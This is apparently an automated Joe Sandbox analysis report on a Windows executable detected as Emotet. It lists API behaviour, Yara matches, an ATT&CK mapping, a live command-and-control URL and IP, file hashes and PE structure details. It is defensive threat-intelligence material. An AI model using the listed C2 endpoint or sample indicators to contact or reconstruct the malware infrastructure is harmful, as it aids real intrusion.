                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_004013A4 LoadLibraryA, GetProcAddress, CreateDirectoryA, LoadLibraryA, GetProcAddress, GetProcAddress, LdrFindResource_U, LdrAccessResource, CreateDirectoryA, VirtualAlloc
                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_02234E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_02233F20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_02274E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_02273F20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_02225ABE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_0222095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_022269BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_02220456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_02241030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_022342F0 GetProcessHeap, RtlAllocateHeap, RtlAllocateHeap
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_00409C36 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_00409C48 SetUnhandledExceptionFilter
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_00409C36 SetUnhandledExceptionFilter
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Code function: 1_2_00409C48 SetUnhandledExceptionFilter
                Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp | Binary or memory string: Progman
                Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_00406204 GetLocalTime, GetSystemTime, GetTimeZoneInformation
                Source: C:\Users\user\Desktop\2ojdmC51As.exe | Code function: 0_2_00425FF1 GetVersion, GetProcessVersion, LoadCursorA, LoadCursorA, LoadCursorA
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Emotet
                Source: Yara match | File source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Service Execution 1 | Windows Service 2 | Windows Service 2 | Masquerading 12 | Input Capture 2 | System Time Discovery 2 | Remote Services | Input Capture 2 | Exfiltration Over Other Network Medium | Encrypted Channel 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
                Default Accounts | Native API 11 | Boot or Logon Initialization Scripts | Process Injection 2 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Archive Collected Data 11 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 2 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | System Service Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 16 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label | Link
                2ojdmC51As.exe | 100% | Joe Sandbox ML | |

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                Source | Detection | Scanner | Label | Link | Download
                0.2.2ojdmC51As.exe.2230000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | |
                1.2.sort.exe.2270000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | |

                Domains

                No Antivirus matches

                URLs

                Source | Detection | Scanner | Label | Link
                http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm | 0% | Avira URL Cloud | safe |
                https://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ | 0% | Avira URL Cloud | safe |
                https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm | 0% | Avira URL Cloud | safe |

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                https://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.hulu.com/privacy | svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp | false | | high
                http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm | sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.g5e.com/G5_End_User_License_Supplemental_Terms | svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp | false | | high
                https://www.hulu.com/do-not-sell-my-info | svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp | false | | high
                http://www.hulu.com/terms | svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp | false | | high
                https://corp.roblox.com/contact/ | svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp | false | | high
                https://www.roblox.com/develop | svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp | false | | high
                http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1 | svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp | false | | high
                https://instagram.com/hiddencity_ | svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp | false | | high
                https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm | sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.roblox.com/info/privacy | svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp | false | | high
                http://www.g5e.com/termsofservice | svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp | false | | high
                https://en.help.roblox.com/hc/en-us | svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp | false | | high
                https://corp.roblox.com/parents/ | svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp | false | | high
                https://www.hulu.com/ca-privacy-rights | svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp | false | | high

                                          Contacted IPs

                                          Public

                                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                          200.116.145.225 | unknown | Colombia | | 13489 | EPMTelecomunicacionesSAESPCO | true

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:319735
                                          Start date:18.11.2020
                                          Start time:15:59:41
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 7m 38s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:2ojdmC51As.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:14
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal80.troj.evad.winEXE@6/0@0/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 65.4% (good quality ratio 64.7%)
                                          • Quality average: 85%
                                          • Quality standard deviation: 22.1%
                                          HCA Information:
                                          • Successful, ratio: 86%
                                          • Number of executed functions: 57
                                          • Number of non-executed functions: 353
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 51.104.139.180, 52.155.217.156, 20.54.26.129, 67.26.137.254, 8.241.11.126, 8.248.133.254, 8.253.204.249, 8.253.204.121, 92.122.213.247, 92.122.213.194, 51.11.168.160
                                          • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/319735/sample/2ojdmC51As.exe

                                          Simulations

                                          Behavior and APIs

                                          Time | Type | Description
                                          16:01:17 | API Interceptor | 10x Sleep call for process: svchost.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                          200.116.145.225 | GM8716863026AA.doc | | malicious | | 200.116.145.225:443/eHRi0AsvmChNb0B/Sq2LBDG3K/dHE8SMLlJOlFGym/g6iocDdP0QPHR/

                                          Domains

                                          No context

                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          No created / dropped files found

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.0032331918802715
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.83%
                                          • Windows Screen Saver (13104/52) 0.13%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:2ojdmC51As.exe
                                          File size:376832
                                          MD5:5804d97670dcdfab88ba830682355dad
                                          SHA1:65c817fb511824fa185f34ecd744b836ed7a19eb
                                          SHA256:4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc
                                          SHA512:befd479d37ff5bef768d61aeec101b4f584e8519f4b3d60f6f0692614ce8925a8303ae478b4d21652b64bc36bc38e9df2eb44d874c2f973f310f2e8ff2a0c7a4
                                          SSDEEP:6144:HzoTjUrx4KVHa9eUfTLHy2VrH0D+wieIMl7lT2IcO/wksAPJLzx:ToCHVcjZwie57l6i/wi
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..`r..`r..`r..`r..`r..sr..`r..as..`r..arC.`rp.nr..`r..jr..`r..kr..`rK.fr..`rRich..`r................PE..L......_...........

                                          File Icon

                                          Icon Hash:71b018ccc6577131

                                          Static PE Info

                                          General

                                          Entrypoint:0x406388
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x5F920784 [Thu Oct 22 22:28:20 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:875a1634331d344707689db6d9489063

                                          Entrypoint Preview

                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          push FFFFFFFFh
                                          push 0042F100h
                                          push 00409800h
                                          mov eax, dword ptr fs:[00000000h]
                                          push eax
                                          mov dword ptr fs:[00000000h], esp
                                          sub esp, 58h
                                          push ebx
                                          push esi
                                          push edi
                                          mov dword ptr [ebp-18h], esp
                                          call dword ptr [0042B2CCh]
                                          xor edx, edx
                                          mov dl, ah
                                          mov dword ptr [00439D04h], edx
                                          mov ecx, eax
                                          and ecx, 000000FFh
                                          mov dword ptr [00439D00h], ecx
                                          shl ecx, 08h
                                          add ecx, edx
                                          mov dword ptr [00439CFCh], ecx
                                          shr eax, 10h
                                          mov dword ptr [00439CF8h], eax
                                          push 00000001h
                                          call 00007F25005A0C0Eh
                                          pop ecx
                                          test eax, eax
                                          jne 00007F250059F68Ah
                                          push 0000001Ch
                                          call 00007F250059F748h
                                          pop ecx
                                          call 00007F25005A2079h
                                          test eax, eax
                                          jne 00007F250059F68Ah
                                          push 00000010h
                                          call 00007F250059F737h
                                          pop ecx
                                          xor esi, esi
                                          mov dword ptr [ebp-04h], esi
                                          call 00007F25005A28B2h
                                          call dword ptr [0042B1D0h]
                                          mov dword ptr [0043B87Ch], eax
                                          call 00007F25005A2770h
                                          mov dword ptr [00439CE8h], eax
                                          call 00007F25005A2519h
                                          call 00007F25005A245Bh
                                          call 00007F250059F86Ch
                                          mov dword ptr [ebp-30h], esi
                                          lea eax, dword ptr [ebp-5Ch]
                                          push eax
                                          call dword ptr [0042B1D4h]
                                          call 00007F25005A23ECh
                                          mov dword ptr [ebp-64h], eax
                                          test byte ptr [ebp-30h], 00000001h
                                          je 00007F250059F688h
                                          movzx eax, word ptr [ebp+00h]

                                          Rich Headers

                                          Programming Language:
                                          • [ C ] VS98 (6.0) build 8168
                                          • [RES] VS98 (6.0) cvtres build 1720
                                          • [C++] VS98 (6.0) build 8168

                                          Data Directories

                                          Name                                   Virtual Address  Virtual Size  Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT           0x33a68          0xb4          .rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE         0x3c000          0x23812       .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC        0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IAT              0x2b000          0x5c8         .rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

                                          Sections

                                          Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                          .text   0x1000           0x29ef1       0x2a000   False     0.574718656994   data       6.56296579611  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata  0x2b000          0xa8be        0xb000    False     0.309792258523   data       4.42786700159  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data   0x36000          0x5890        0x2000    False     0.253784179688   data       3.64382398996  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rsrc   0x3c000          0x23812       0x24000   False     0.909579806858   data       7.73501222548  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name             RVA      Size     Type                  Language  Country
                                          RT_CURSOR        0x3c8e0  0x134    data                  English   United States
                                          RT_CURSOR        0x3ca14  0xb4     data                  English   United States
                                          RT_CURSOR        0x3cac8  0x134    data                  English   United States
                                          RT_CURSOR        0x3cbfc  0xb4     data                  English   United States
                                          RT_ICON          0x3ccb0  0x2e8    dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676  English   United States
                                          RT_ICON          0x3cf98  0x128    GLS_BINARY_LSB_FIRST  English   United States
                                          RT_ICON          0x3d0c0  0x2e8    data                  English   United States
                                          RT_ICON          0x3d3a8  0x128    GLS_BINARY_LSB_FIRST  English   United States
                                          RT_MENU          0x3d4d0  0x23e    data                  English   United States
                                          RT_STRING        0x3d710  0x90     data                  English   United States
                                          RT_STRING        0x3d7a0  0x3e     data                  English   United States
                                          RT_STRING        0x3d7e0  0x296    data                  English   United States
                                          RT_STRING        0x3da78  0x260    data                  English   United States
                                          RT_STRING        0x3dcd8  0x328    data                  English   United States
                                          RT_STRING        0x3e000  0x70     data                  English   United States
                                          RT_STRING        0x3e070  0x106    data                  English   United States
                                          RT_STRING        0x3e178  0xda     data                  English   United States
                                          RT_STRING        0x3e254  0x46     data                  English   United States
                                          RT_STRING        0x3e29c  0xc6     data                  English   United States
                                          RT_STRING        0x3e364  0x1f8    data                  English   United States
                                          RT_STRING        0x3e55c  0x86     data                  English   United States
                                          RT_STRING        0x3e5e4  0xd0     data                  English   United States
                                          RT_STRING        0x3e6b4  0x2a     data                  English   United States
                                          RT_STRING        0x3e6e0  0x14a    data                  English   United States
                                          RT_STRING        0x3e82c  0x124    data                  English   United States
                                          RT_STRING        0x3e950  0x4e2    data                  English   United States
                                          RT_STRING        0x3ee34  0x2a2    data                  English   United States
                                          RT_STRING        0x3f0d8  0x2dc    data                  English   United States
                                          RT_STRING        0x3f3b4  0xac     data                  English   United States
                                          RT_STRING        0x3f460  0xde     data                  English   United States
                                          RT_STRING        0x3f540  0x4c4    data                  English   United States
                                          RT_STRING        0x3fa04  0x264    data                  English   United States
                                          RT_STRING        0x3fc68  0x2c     data                  English   United States
                                          RT_ACCELERATOR   0x3fc94  0x70     data                  English   United States
                                          RT_ACCELERATOR   0x3fd04  0x18     data                  English   United States
                                          RT_RCDATA        0x3fd1c  0x1f733  data                  English   United States
                                          RT_GROUP_CURSOR  0x5f450  0x22     Lotus unknown worksheet or configuration, revision 0x2  English   United States
                                          RT_GROUP_CURSOR  0x5f474  0x22     Lotus unknown worksheet or configuration, revision 0x2  English   United States
                                          RT_GROUP_ICON    0x5f498  0x22     data                  English   United States
                                          RT_GROUP_ICON    0x5f4bc  0x22     data                  English   United States
                                          RT_VERSION       0x5f4e0  0x314    data                  English   United States
                                          None             0x5f7f4  0x1e     data                  English   United States

                                          Imports

                                          DLL           Import
                                          KERNEL32.dll  VirtualFree, IsBadWritePtr, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapCreate, IsBadCodePtr, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, HeapDestroy, GetACP, HeapSize, HeapReAlloc, RaiseException, TerminateProcess, ExitProcess, GetCommandLineA, GetStartupInfoA, HeapFree, InterlockedExchange, GetLocalTime, GetSystemTime, GetTimeZoneInformation, RtlUnwind, HeapAlloc, FileTimeToLocalFileTime, FileTimeToSystemTime, SetErrorMode, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, GetVolumeInformationA, FindFirstFileA, FindClose, DeleteFileA, MoveFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, DuplicateHandle, GetOEMCP, GetCPInfo, GetProcessVersion, WritePrivateProfileStringA, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalFree, LocalAlloc, WideCharToMultiByte, InterlockedIncrement, GlobalFlags, InterlockedDecrement, GetLastError, SetLastError, MulDiv, lstrlenA, MultiByteToWideChar, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetFullPathNameA, GetTempFileNameA, lstrcpynA, GetFileAttributesA, FreeLibrary, GetVersion, lstrcatA, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, lstrcpyA, GetModuleHandleA, CloseHandle, GetModuleFileNameA, GlobalAlloc, GlobalDeleteAtom, lstrcmpiA, GetCurrentThread, GetCurrentThreadId, lstrcmpA, GlobalLock, GlobalUnlock, GlobalFree, LockResource, FindResourceA, LoadResource, GetTickCount, Sleep, LoadLibraryA, VirtualAlloc, GetModuleHandleExA, GetProcAddress, GetCurrentProcess, IsBadReadPtr
                                          USER32.dll    TranslateAcceleratorA, ReleaseCapture, GetDesktopWindow, DestroyMenu, LoadMenuA, SetMenu, ReuseDDElParam, UnpackDDElParam, BringWindowToTop, ClientToScreen, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, DrawTextA, GrayStringA, IsZoomed, SetParent, IsRectEmpty, AppendMenuA, DeleteMenu, GetSystemMenu, GetClassNameA, GetSysColorBrush, LoadStringA, CharUpperA, FindWindowA, GetTabbedTextExtentA, KillTimer, WindowFromPoint, InflateRect, SetCapture, InvertRect, GetDCEx, LockWindowUpdate, GetDC, ReleaseDC, LoadCursorA, DestroyCursor, ShowWindow, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, LoadIconA, UpdateWindow, SendDlgItemMessageA, MapWindowPoints, GetSysColor, SetFocus, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, BeginDeferWindowPos, CopyRect, EndDeferWindowPos, ScrollWindow, GetScrollInfo, LoadAcceleratorsA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, GetTopWindow, IsChild, GetCapture, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, DefWindowProcA, CreateWindowExA, GetClassLongA, SetPropA, UnhookWindowsHookEx, GetPropA, CallWindowProcA, RemovePropA, GetMessageTime, GetMessagePos, GetForegroundWindow, SetForegroundWindow, GetWindow, SetWindowLongA, SetWindowPos, RegisterWindowMessageA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetFocus, GetKeyState, CallNextHookEx, ValidateRect, IsWindowVisible, GetCursorPos, SetWindowsHookExA, GetLastActivePopup, MessageBoxA, SetCursor, ShowOwnedPopups, PostMessageA, PostQuitMessage, GetNextDlgTabItem, EndDialog, GetActiveWindow, SetActiveWindow, IsWindow, GetSystemMetrics, CreateDialogIndirectParamA, DestroyWindow, GetParent, GetWindowLongA, GetDlgItem, IsWindowEnabled, SetRectEmpty, PtInRect, FillRect, SetScrollInfo, SetRect, SendMessageA, PeekMessageA, GetMessageA, TranslateMessage, DispatchMessageA, SetTimer, InvalidateRect, GetClientRect, LoadBitmapA, EnableWindow, GetMenuItemID, UnregisterClassA
